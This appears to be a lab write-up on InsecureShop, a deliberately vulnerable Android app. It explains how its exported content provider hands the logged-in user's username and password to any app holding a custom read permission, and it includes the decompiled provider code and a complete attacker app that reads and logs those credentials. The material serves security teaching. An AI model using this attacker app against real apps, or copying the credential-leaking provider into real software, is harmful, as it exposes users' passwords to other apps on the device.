Insecure Content Provider
The content provider com.insecureshop.contentProvider.InsecureShopProvider is exported because its manifest entry sets android:exported="true", so any other app on the device can resolve it; the only gate is the read permission named in the same element:

<provider android:name="com.insecureshop.contentProvider.InsecureShopProvider" android:readPermission="com.insecureshop.permission.READ" android:exported="true" android:authorities="com.insecureshop.provider"/>
The content provider com.insecureshop.contentProvider.InsecureShopProvider contains the following code (decompiled output; the class wrapper, imports and comments are added here, and the ContentProvider methods the decompiled output does not show are stubbed so that the class compiles):

package com.insecureshop.contentProvider;

import android.content.ContentProvider;
import android.content.ContentValues;
import android.content.UriMatcher;
import android.database.Cursor;
import android.database.MatrixCursor;
import android.net.Uri;
import com.insecureshop.util.Prefs;

public class InsecureShopProvider extends ContentProvider {
    private static UriMatcher uriMatcher;

    public boolean onCreate() {
        // UriMatcher(-1) is UriMatcher(UriMatcher.NO_MATCH): unmatched URIs yield -1
        UriMatcher uriMatcher2 = new UriMatcher(-1);
        uriMatcher = uriMatcher2;
        if (uriMatcher2 == null) { // decompiler artifact of a Kotlin null check, never taken
            return true;
        }
        // The only registered URI: content://com.insecureshop.provider/insecure -> code 100
        uriMatcher2.addURI("com.insecureshop.provider", "insecure", 100);
        return true;
    }

    public Cursor query(Uri uri, String[] projection, String selection, String[] selectionArgs, String sortOrder) {
        kotlin.jvm.internal.Intrinsics.checkParameterIsNotNull(uri, "uri"); // Kotlin-emitted null check
        UriMatcher uriMatcher2 = uriMatcher;
        if (uriMatcher2 == null || uriMatcher2.match(uri) != 100) {
            return null; // every other URI gets nothing
        }
        // projection, selection and sortOrder are ignored: the cursor always holds
        // exactly one row containing the stored username and password
        MatrixCursor cursor = new MatrixCursor(new String[]{"username", "password"});
        String[] strArr = new String[2];
        String username = Prefs.INSTANCE.getUsername();
        if (username == null) {
            kotlin.jvm.internal.Intrinsics.throwNpe(); // no logged-in user: throws NullPointerException
        }
        strArr[0] = username;
        String password = Prefs.INSTANCE.getPassword();
        if (password == null) {
            kotlin.jvm.internal.Intrinsics.throwNpe();
        }
        strArr[1] = password;
        cursor.addRow(strArr);
        return cursor;
    }

    // Not shown in the decompiled output; stubbed here so the class compiles
    public String getType(Uri uri) { return null; }
    public Uri insert(Uri uri, ContentValues values) { return null; }
    public int delete(Uri uri, String selection, String[] selectionArgs) { return 0; }
    public int update(Uri uri, ContentValues values, String selection, String[] selectionArgs) { return 0; }
}
If the URI passed to query() matches the registered pattern, i.e. content://com.insecureshop.provider/insecure, the provider returns the username and password of the logged-in user; any other URI returns null.

Exploiting this is not entirely straightforward. You need to build an Android app, because the provider cannot be queried from adb or from the standard drozer agent: it is guarded by android:readPermission="com.insecureshop.permission.READ", and neither the adb shell user nor the drozer agent holds that permission, so the query fails with a SecurityException. You need to request this permission in the attacker app's AndroidManifest.xml, with <uses-permission android:name="com.insecureshop.permission.READ"/>, in order to access the content provider. Since the permission is a custom one defined by the app, whether the system grants it to a third-party app depends on the android:protectionLevel of its <permission> declaration; if it is obtainable by any app, the readPermission offers no real protection. Note also that Prefs.getUsername() and Prefs.getPassword() must be non-null, so a user has to be logged in to InsecureShop when the query runs; otherwise query() throws a NullPointerException instead of returning the cursor.
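A minimal attacker app that performs the query described above, as an added example that is not part of the original writeup or of InsecureShop. The package name com.example.providerreader and the class MainActivity are hypothetical; the URI and the permission name are the ones from the manifest entry and code above. The manifest fragment the app needs is shown as a comment at the top of the file.

```java
// Added example (not InsecureShop's code). The attacker app's AndroidManifest.xml
// must request the provider's read permission, otherwise query() throws
// SecurityException:
//
//   <uses-permission android:name="com.insecureshop.permission.READ" />
//
package com.example.providerreader;  // hypothetical package name

import android.app.Activity;
import android.database.Cursor;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;

public class MainActivity extends Activity {
    private static final String TAG = "ProviderReader";

    // Authority "com.insecureshop.provider" plus path "insecure" is the only URI
    // that the provider's UriMatcher maps to code 100; anything else returns null.
    private static final Uri TARGET =
            Uri.parse("content://com.insecureshop.provider/insecure");

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        dumpCredentials();
    }

    private void dumpCredentials() {
        Cursor c = null;
        try {
            // The provider ignores projection, selection and sort order, so pass nulls.
            c = getContentResolver().query(TARGET, null, null, null, null);
            if (c == null) {
                // Only happens when the URI does not match code 100 in query().
                Log.e(TAG, "query returned null: URI not matched by provider");
                return;
            }
            int userCol = c.getColumnIndexOrThrow("username");
            int passCol = c.getColumnIndexOrThrow("password");
            // The MatrixCursor holds a single row: the logged-in user's credentials.
            while (c.moveToNext()) {
                Log.i(TAG, "username=" + c.getString(userCol)
                        + " password=" + c.getString(passCol));
            }
        } catch (SecurityException e) {
            // Raised when the caller has not been granted
            // com.insecureshop.permission.READ (e.g. adb shell or a stock drozer agent).
            Log.e(TAG, "permission denied: " + e.getMessage());
        } finally {
            if (c != null) c.close();
        }
    }
}
```

Install the app alongside InsecureShop, log in to InsecureShop so that Prefs holds a username and password, then launch the attacker app and read the result from logcat. Removing the uses-permission element from the manifest and rerunning reproduces the SecurityException that blocks adb and drozer.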